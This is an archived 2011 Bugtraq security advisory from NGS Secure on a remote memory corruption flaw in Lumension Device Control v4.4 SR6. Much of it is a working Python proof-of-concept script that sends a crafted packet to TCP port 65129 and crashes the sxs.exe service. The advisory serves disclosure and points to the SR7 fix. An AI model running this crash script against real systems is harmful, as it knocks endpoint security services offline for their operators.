| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <7E45577E4E72EC42BB3F8560D57E755134CE08FC@manexchprd02> Date: Wed, 24 Aug 2011 07:38:58 +0000 From: "Research@...Secure" <research@...secure.com> To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com> Subject: NGS00054 Technical Advisory: : Lumension Device Control (formerly Sanctuary) remote memory corruption ======= Summary ======= Name: Lumension Device Control (formerly Sanctuary) remote memory corruption Release Date: 24 August 2011 Reference: NGS00054 Discoverer: Andy Davis <andy.davis@...secure.com> Vendor: Lumension Vendor Reference: Systems Affected: Lumension Device Control v4.4 SR6 Risk: High Status: Published ======== TimeLine ======== Discovered: 3 March 2011 Released: 3 March 2011 Approved: 3 March 2011 Reported: 3 March 2011 Fixed: 24 May 2011 Published: 24 August 2011 =========== Description =========== By sending a specially crafted packet to TCP port 65129 the sxs.exe service running on the Lumension application server terminates ================= Technical Details ================= A simple PoC is presented here: #!/usr/local/bin/python import sys from socket import * import os if (len(sys.argv)!=2): print "\n--------------------------------------------------" print "Usage: %s <target IP>" % sys.argv[0] print "--------------------------------------------------\n" exit(0) host=sys.argv[1] port=65129 packet1 = "\xec\x02\x00\x00" #length of remaining packet packet1 += "\xc9\x00\x00\x00" #some kind of packet ID? #packet1 += "\x18\x00\x00\x00" packet1 += "\x61\x61\x61\x61" #crash occurs here packet1 += "\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3" packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00" packet1 += "\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde" packet1 += "\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01" packet1 += "\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00" packet1 += "\x34\x2e\x34\x2e\x31\x34\x35\x32" #client version packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e" packet1 += "\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99" packet1 += "\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00" packet1 += "\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3" packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00" packet1 += "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" packet1 += "\xc0\xa8\x00\x6b" #client IP address packet1 += "\xff\xff\xff\x00" #client subnet mask packet1 += "\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00" packet1 += "\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00" # client hostname packet1 += "\x00" * 480 packet1 += "\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80" packet1 += "\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00" packet1 += "\x00\x00\x00\x00\x00\x00" s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(packet1) print s.recv(1024) s.close() =============== Fix Information =============== This issue is addressed in SR7, which can be downloaded by registered customers at: https://portal.lumension.com/ NGS Secure Research http://www.ngssecure.com
Powered by blists - more mailing lists